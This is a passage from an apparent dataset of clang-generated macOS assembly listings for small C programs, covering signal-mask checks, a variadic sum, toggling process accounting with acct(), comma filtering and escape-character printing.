.cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function HandleUSR2 _HandleUSR2: ## @HandleUSR2 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $30, %edi movl $31, %esi xorl %edx, %edx movb $0, %al callq _CheckMask cmpl $0, %eax jne LBB2_2 ## %bb.1: movl $1, %edi callq _exit LBB2_2: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function CheckMask _CheckMask: ## @CheckMask .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $320, %rsp ## imm = 0x140 testb %al, %al je LBB3_40 ## %bb.39: movaps %xmm0, -208(%rbp) movaps %xmm1, -192(%rbp) movaps %xmm2, -176(%rbp) movaps %xmm3, -160(%rbp) movaps %xmm4, -144(%rbp) movaps %xmm5, -128(%rbp) movaps %xmm6, -112(%rbp) movaps %xmm7, -96(%rbp) LBB3_40: movq %r9, -216(%rbp) movq %r8, -224(%rbp) movq %rcx, -232(%rbp) movq %rdx, -240(%rbp) movq %rsi, -248(%rbp) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl %edi, -60(%rbp) movl $3, %edi xorl %eax, %eax movl %eax, %esi leaq -64(%rbp), %rdx callq _sigprocmask movl $0, -68(%rbp) cmpl $0, -60(%rbp) je LBB3_14 ## %bb.1: movl -60(%rbp), %eax movl %eax, -36(%rbp) cmpl $32, -36(%rbp) jle LBB3_3 ## %bb.2: xorl %eax, %eax movl %eax, -260(%rbp) ## 4-byte Spill jmp LBB3_4 LBB3_3: movl -36(%rbp), %ecx subl $1, %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax movl %eax, -260(%rbp) ## 4-byte Spill LBB3_4: movl -260(%rbp), %eax ## 4-byte Reload orl -68(%rbp), %eax movl %eax, -68(%rbp) leaq -32(%rbp), %rax leaq -256(%rbp), %rcx movq %rcx, 16(%rax) leaq 16(%rbp), %rcx movq %rcx, 8(%rax) movl $48, 4(%rax) movl $8, (%rax) LBB3_5: ## =>This Inner Loop Header: Depth=1 leaq -32(%rbp), %rax movq %rax, -272(%rbp) ## 8-byte Spill movl -32(%rbp), %eax movl %eax, -264(%rbp) ## 4-byte Spill cmpl $40, %eax ja LBB3_7 ## %bb.6: ## in Loop: Header=BB3_5 Depth=1 movq -272(%rbp), %rcx ## 8-byte Reload movl -264(%rbp), %edx ## 4-byte Reload movslq %edx, %rax addq 16(%rcx), %rax addl $8, %edx movl %edx, (%rcx) movq %rax, -280(%rbp) ## 8-byte Spill jmp LBB3_8 LBB3_7: ## in Loop: Header=BB3_5 Depth=1 movq -272(%rbp), %rcx ## 8-byte Reload movq 8(%rcx), %rax movq %rax, %rdx addq $8, %rdx movq %rdx, 8(%rcx) movq %rax, -280(%rbp) ## 8-byte Spill LBB3_8: ## in Loop: Header=BB3_5 Depth=1 movq -280(%rbp), %rax ## 8-byte Reload movl (%rax), %eax movl %eax, -60(%rbp) cmpl $0, %eax je LBB3_13 ## %bb.9: ## in Loop: Header=BB3_5 Depth=1 movl -60(%rbp), %eax movl %eax, -40(%rbp) cmpl $32, -40(%rbp) jle LBB3_11 ## %bb.10: ## in Loop: Header=BB3_5 Depth=1 xorl %eax, %eax movl %eax, -284(%rbp) ## 4-byte Spill jmp LBB3_12 LBB3_11: ## in Loop: Header=BB3_5 Depth=1 movl -40(%rbp), %ecx subl $1, %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax movl %eax, -284(%rbp) ## 4-byte Spill LBB3_12: ## in Loop: Header=BB3_5 Depth=1 movl -284(%rbp), %eax ## 4-byte Reload orl -68(%rbp), %eax movl %eax, -68(%rbp) jmp LBB3_5 LBB3_13: leaq -32(%rbp), %rax LBB3_14: movl $1, -72(%rbp) movl $1, -60(%rbp) LBB3_15: ## =>This Inner Loop Header: Depth=1 cmpl $32, -60(%rbp) jge LBB3_36 ## %bb.16: ## in Loop: Header=BB3_15 Depth=1 movl -64(%rbp), %eax movl %eax, -288(%rbp) ## 4-byte Spill movl -60(%rbp), %eax movl %eax, -44(%rbp) cmpl $32, -44(%rbp) jle LBB3_18 ## %bb.17: ## in Loop: Header=BB3_15 Depth=1 xorl %eax, %eax movl %eax, -292(%rbp) ## 4-byte Spill jmp LBB3_19 LBB3_18: ## in Loop: Header=BB3_15 Depth=1 movl -44(%rbp), %ecx subl $1, %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax movl %eax, -292(%rbp) ## 4-byte Spill LBB3_19: ## in Loop: Header=BB3_15 Depth=1 movl -288(%rbp), %eax ## 4-byte Reload movl -292(%rbp), %ecx ## 4-byte Reload andl %ecx, %eax cmpl $0, %eax jne LBB3_25 ## %bb.20: ## in Loop: Header=BB3_15 Depth=1 movl -68(%rbp), %eax movl %eax, -296(%rbp) ## 4-byte Spill movl -60(%rbp), %eax movl %eax, -48(%rbp) cmpl $32, -48(%rbp) jle LBB3_22 ## %bb.21: ## in Loop: Header=BB3_15 Depth=1 xorl %eax, %eax movl %eax, -300(%rbp) ## 4-byte Spill jmp LBB3_23 LBB3_22: ## in Loop: Header=BB3_15 Depth=1 movl -48(%rbp), %ecx subl $1, %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax movl %eax, -300(%rbp) ## 4-byte Spill LBB3_23: ## in Loop: Header=BB3_15 Depth=1 movl -296(%rbp), %eax ## 4-byte Reload movl -300(%rbp), %ecx ## 4-byte Reload andl %ecx, %eax cmpl $0, %eax je LBB3_25 ## %bb.24: ## in Loop: Header=BB3_15 Depth=1 movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movl -60(%rbp), %edx leaq L_.str.2(%rip), %rsi movb $0, %al callq _fprintf movl $0, -72(%rbp) LBB3_25: ## in Loop: Header=BB3_15 Depth=1 movl -64(%rbp), %eax movl %eax, -304(%rbp) ## 4-byte Spill movl -60(%rbp), %eax movl %eax, -52(%rbp) cmpl $32, -52(%rbp) jle LBB3_27 ## %bb.26: ## in Loop: Header=BB3_15 Depth=1 xorl %eax, %eax movl %eax, -308(%rbp) ## 4-byte Spill jmp LBB3_28 LBB3_27: ## in Loop: Header=BB3_15 Depth=1 movl -52(%rbp), %ecx subl $1, %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax movl %eax, -308(%rbp) ## 4-byte Spill LBB3_28: ## in Loop: Header=BB3_15 Depth=1 movl -304(%rbp), %eax ## 4-byte Reload movl -308(%rbp), %ecx ## 4-byte Reload andl %ecx, %eax cmpl $0, %eax je LBB3_34 ## %bb.29: ## in Loop: Header=BB3_15 Depth=1 movl -68(%rbp), %eax movl %eax, -312(%rbp) ## 4-byte Spill movl -60(%rbp), %eax movl %eax, -56(%rbp) cmpl $32, -56(%rbp) jle LBB3_31 ## %bb.30: ## in Loop: Header=BB3_15 Depth=1 xorl %eax, %eax movl %eax, -316(%rbp) ## 4-byte Spill jmp LBB3_32 LBB3_31: ## in Loop: Header=BB3_15 Depth=1 movl -56(%rbp), %ecx subl $1, %ecx movl $1, %eax ## kill: def $cl killed $ecx shll %cl, %eax movl %eax, -316(%rbp) ## 4-byte Spill LBB3_32: ## in Loop: Header=BB3_15 Depth=1 movl -312(%rbp), %eax ## 4-byte Reload movl -316(%rbp), %ecx ## 4-byte Reload andl %ecx, %eax cmpl $0, %eax jne LBB3_34 ## %bb.33: ## in Loop: Header=BB3_15 Depth=1 movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movl -60(%rbp), %edx leaq L_.str.3(%rip), %rsi movb $0, %al callq _fprintf movl $0, -72(%rbp) LBB3_34: ## in Loop: Header=BB3_15 Depth=1 jmp LBB3_35 LBB3_35: ## in Loop: Header=BB3_15 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB3_15 LBB3_36: movl -72(%rbp), %eax movl %eax, -320(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB3_38 ## %bb.37: movl -320(%rbp), %eax ## 4-byte Reload addq $320, %rsp ## imm = 0x140 popq %rbp retq LBB3_38: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Unable handle signal USR1\n" L_.str.1: ## @.str.1 .asciz "Unable handle signal USR2\n" L_.str.2: ## @.str.2 .asciz "Mask missing signal %d\n" L_.str.3: ## @.str.3 .asciz "Mask unexpectedly has signal %d\n" .subsections_via_symbols
the_stack_data/82621.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _total ; -- Begin function total .p2align 2 _total: ; @total .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str w0, [sp, #44] movi d0, #0000000000000000 str d0, [sp, #32] add x9, sp, #24 add x8, sp, #48 str x8, [x9] str wzr, [sp, #20] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] ldr w9, [sp, #44] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr x9, [sp, #24] ldr x8, [x9] add x9, x9, #8 str x9, [sp, #24] str x8, [sp, #8] ldr d1, [sp, #8] ldr d0, [sp, #32] fadd d0, d0, d1 str d0, [sp, #32] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_4: ldr d0, [sp, #32] add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI1_0: .quad 0x401d333333333332 ; double 7.2999999999999989 lCPI1_1: .quad 0x4004cccccccccccd ; double 2.6000000000000001 lCPI1_2: .quad 0x3fe3333333333333 ; double 0.59999999999999998 lCPI1_3: .quad 0x4008cccccccccccd ; double 3.1000000000000001 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-8] ; 4-byte Folded Spill stur wzr, [x29, #-4] mov x8, sp adrp x9, lCPI1_3@PAGE ldr d0, [x9, lCPI1_3@PAGEOFF] str d0, [sp, #48] ; 8-byte Folded Spill str d0, [x8] fmov d0, #1.00000000 str d0, [sp, #40] ; 8-byte Folded Spill str d0, [x8, #8] adrp x9, lCPI1_2@PAGE ldr d0, [x9, lCPI1_2@PAGEOFF] stur d0, [x29, #-40] ; 8-byte Folded Spill str d0, [x8, #16] adrp x9, lCPI1_1@PAGE ldr d0, [x9, lCPI1_1@PAGEOFF] stur d0, [x29, #-32] ; 8-byte Folded Spill str d0, [x8, #24] mov w0, #4 stur w0, [x29, #-20] ; 4-byte Folded Spill bl _total mov x8, sp str d0, [x8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF stur x0, [x29, #-16] ; 8-byte Folded Spill bl _printf ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x8, sp adrp x9, lCPI1_0@PAGE ldr d0, [x9, lCPI1_0@PAGEOFF] str d0, [x8] bl _printf ldr d0, [sp, #48] ; 8-byte Folded Reload mov x8, sp str d0, [x8] mov w0, #1 bl _total ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x8, sp str d0, [x8] bl _printf ldur w0, [x29, #-8] ; 4-byte Folded Reload bl _total ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x8, sp str d0, [x8] bl _printf ldr d1, [sp, #40] ; 8-byte Folded Reload ldr d2, [sp, #48] ; 8-byte Folded Reload ldur d0, [x29, #-40] ; 8-byte Folded Reload mov x8, sp str d2, [x8] str d1, [x8, #8] str d0, [x8, #16] mov w0, #2 bl _total ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x8, sp str d0, [x8] bl _printf ldr d1, [sp, #40] ; 8-byte Folded Reload ldr d2, [sp, #48] ; 8-byte Folded Reload ldur d0, [x29, #-40] ; 8-byte Folded Reload ldur w0, [x29, #-20] ; 4-byte Folded Reload mov x8, sp str d2, [x8] str d1, [x8, #8] str d0, [x8, #16] bl _total ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x8, sp str d0, [x8] bl _printf ldr d2, [sp, #48] ; 8-byte Folded Reload ldur d1, [x29, #-40] ; 8-byte Folded Reload ldur d0, [x29, #-32] ; 8-byte Folded Reload ldur w0, [x29, #-20] ; 4-byte Folded Reload mov x8, sp str d2, [x8] mov x9, #1 str x9, [x8, #8] str d1, [x8, #16] str d0, [x8, #24] bl _total ldur x0, [x29, #-16] ; 8-byte Folded Reload mov x8, sp str d0, [x8] bl _printf ldur w0, [x29, #-8] ; 4-byte Folded Reload ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "The sum is %f.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _total ## -- Begin function total .p2align 4, 0x90 _total: ## @total .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $288, %rsp ## imm = 0x120 testb %al, %al je LBB0_11 ## %bb.10: movaps %xmm0, -192(%rbp) movaps %xmm1, -176(%rbp) movaps %xmm2, -160(%rbp) movaps %xmm3, -144(%rbp) movaps %xmm4, -128(%rbp) movaps %xmm5, -112(%rbp) movaps %xmm6, -96(%rbp) movaps %xmm7, -80(%rbp) LBB0_11: movq %r9, -200(%rbp) movq %r8, -208(%rbp) movq %rcx, -216(%rbp) movq %rdx, -224(%rbp) movq %rsi, -232(%rbp) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl %edi, -36(%rbp) xorps %xmm0, %xmm0 movsd %xmm0, -48(%rbp) leaq -32(%rbp), %rax leaq -240(%rbp), %rcx movq %rcx, 16(%rax) leaq 16(%rbp), %rcx movq %rcx, 8(%rax) movl $48, 4(%rax) movl $8, (%rax) movl $0, -52(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -52(%rbp), %eax cmpl -36(%rbp), %eax jge LBB0_7 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 leaq -32(%rbp), %rax movq %rax, -264(%rbp) ## 8-byte Spill addq $4, %rax movq %rax, -256(%rbp) ## 8-byte Spill movl -28(%rbp), %eax movl %eax, -244(%rbp) ## 4-byte Spill cmpl $160, %eax ja LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq -256(%rbp), %rcx ## 8-byte Reload movl -244(%rbp), %edx ## 4-byte Reload movq -264(%rbp), %rsi ## 8-byte Reload movslq %edx, %rax addq 16(%rsi), %rax addl $16, %edx movl %edx, (%rcx) movq %rax, -272(%rbp) ## 8-byte Spill jmp LBB0_5 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movq -264(%rbp), %rcx ## 8-byte Reload movq 8(%rcx), %rax movq %rax, %rdx addq $8, %rdx movq %rdx, 8(%rcx) movq %rax, -272(%rbp) ## 8-byte Spill LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movq -272(%rbp), %rax ## 8-byte Reload movsd (%rax), %xmm0 ## xmm0 = mem[0],zero addsd -48(%rbp), %xmm0 movsd %xmm0, -48(%rbp) ## %bb.6: ## in Loop: Header=BB0_1 Depth=1 movl -52(%rbp), %eax addl $1, %eax movl %eax, -52(%rbp) jmp LBB0_1 LBB0_7: leaq -32(%rbp), %rax movsd -48(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -280(%rbp) ## 8-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_9 ## %bb.8: movsd -280(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero addq $288, %rsp ## imm = 0x120 popq %rbp retq LBB0_9: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function main LCPI1_0: .quad 0x4008cccccccccccd ## double 3.1000000000000001 LCPI1_1: .quad 0x3fe3333333333333 ## double 0.59999999999999998 LCPI1_2: .quad 0x4004cccccccccccd ## double 2.6000000000000001 LCPI1_3: .quad 0x3ff0000000000000 ## double 1 LCPI1_4: .quad 0x401d333333333332 ## double 7.2999999999999989 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $4, %edi movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero movsd LCPI1_1(%rip), %xmm2 ## xmm2 = mem[0],zero movsd LCPI1_2(%rip), %xmm3 ## xmm3 = mem[0],zero movb $4, %al callq _total leaq L_.str(%rip), %rdi movb $1, %al callq _printf leaq L_.str(%rip), %rdi movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero movb $1, %al callq _printf movl $1, %edi movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero movb $1, %al callq _total leaq L_.str(%rip), %rdi movb $1, %al callq _printf xorl %edi, %edi movb $0, %al callq _total leaq L_.str(%rip), %rdi movb $1, %al callq _printf movl $2, %edi movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero movsd LCPI1_1(%rip), %xmm2 ## xmm2 = mem[0],zero movb $3, %al callq _total leaq L_.str(%rip), %rdi movb $1, %al callq _printf movl $4, %edi movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero movsd LCPI1_1(%rip), %xmm2 ## xmm2 = mem[0],zero movb $3, %al callq _total leaq L_.str(%rip), %rdi movb $1, %al callq _printf movl $4, %edi movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero movl $1, %esi movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero movsd LCPI1_2(%rip), %xmm2 ## xmm2 = mem[0],zero movb $3, %al callq _total leaq L_.str(%rip), %rdi movb $1, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "The sum is %f.\n" .subsections_via_symbols
the_stack_data/125178.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] ldur x8, [x29, #-16] ldr x0, [x8, #8] bl _acct subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_5 b LBB0_1 LBB0_1: ldur x8, [x29, #-16] ldr x8, [x8, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_4 LBB0_3: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_4 LBB0_4: b LBB0_6 LBB0_5: bl ___error ldr w9, [x0] ; implicit-def: $x8 mov x8, x9 str x8, [sp, #24] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror ldr x9, [sp, #24] ; 8-byte Folded Reload mov x8, sp str x9, [x8] str x0, [x8, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_6 LBB0_6: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Monitoramento desabilitado\n" l_.str.1: ; @.str.1 .asciz "Monitoramento habilitado\n" l_.str.2: ; @.str.2 .asciz "Erro %d - %s\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rax movq 8(%rax), %rdi callq _acct cmpl $0, %eax jne LBB0_5 ## %bb.1: movq -16(%rbp), %rax cmpq $0, 8(%rax) jne LBB0_3 ## %bb.2: leaq L_.str(%rip), %rdi movb $0, %al callq _printf jmp LBB0_4 LBB0_3: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB0_4: jmp LBB0_6 LBB0_5: callq ___error movl (%rax), %eax movl %eax, -20(%rbp) ## 4-byte Spill callq ___error movl (%rax), %edi callq _strerror movl -20(%rbp), %esi ## 4-byte Reload movq %rax, %rdx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf LBB0_6: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Monitoramento desabilitado\n" L_.str.1: ## @.str.1 .asciz "Monitoramento habilitado\n" L_.str.2: ## @.str.2 .asciz "Erro %d - %s\n" .subsections_via_symbols
the_stack_data/194549.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] str wzr, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x0, [x8] bl _feof subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_9 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x0, [x8] bl _fgetc strb w0, [sp, #7] ldrsb w8, [sp, #7] subs w8, w8, #34 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] subs w8, w8, #0 cset w8, eq and w8, w8, #0x1 str w8, [sp, #8] ldrsb w0, [sp, #7] adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x1, [x8] bl _fputc b LBB0_8 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldrsb w8, [sp, #7] subs w8, w8, #44 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldrsb w0, [sp, #7] adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x1, [x8] bl _fputc b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_9: mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $0, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _feof cmpl $0, %eax setne %al xorb $-1, %al testb $1, %al jne LBB0_2 jmp LBB0_9 LBB0_2: ## in Loop: Header=BB0_1 Depth=1 movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _fgetc ## kill: def $al killed $al killed $eax movb %al, -9(%rbp) movsbl -9(%rbp), %eax cmpl $34, %eax jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 cmpl $0, -8(%rbp) setne %al xorb $-1, %al andb $1, %al movzbl %al, %eax movl %eax, -8(%rbp) movsbl -9(%rbp), %edi movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _fputc jmp LBB0_8 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movsbl -9(%rbp), %eax cmpl $44, %eax jne LBB0_6 ## %bb.5: ## in Loop: Header=BB0_1 Depth=1 cmpl $1, -8(%rbp) je LBB0_7 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movsbl -9(%rbp), %edi movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _fputc LBB0_7: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_8 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_9: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/67325279.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 bl _getchar str w0, [sp, #8] adds w8, w0, #1 cset w8, eq tbnz w8, #0, LBB0_10 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] str w8, [sp, #4] ; 4-byte Folded Spill subs w8, w8, #8 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload subs w8, w8, #9 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload subs w8, w8, #92 cset w8, eq tbnz w8, #0, LBB0_7 b LBB0_8 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_9 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_9 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_9 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldr w0, [sp, #8] bl _putchar b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_10: ldur w0, [x29, #-4] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\\t" l_.str.1: ; @.str.1 .asciz "\\b" l_.str.2: ; @.str.2 .asciz "\\\\" .subsections_via_symbols
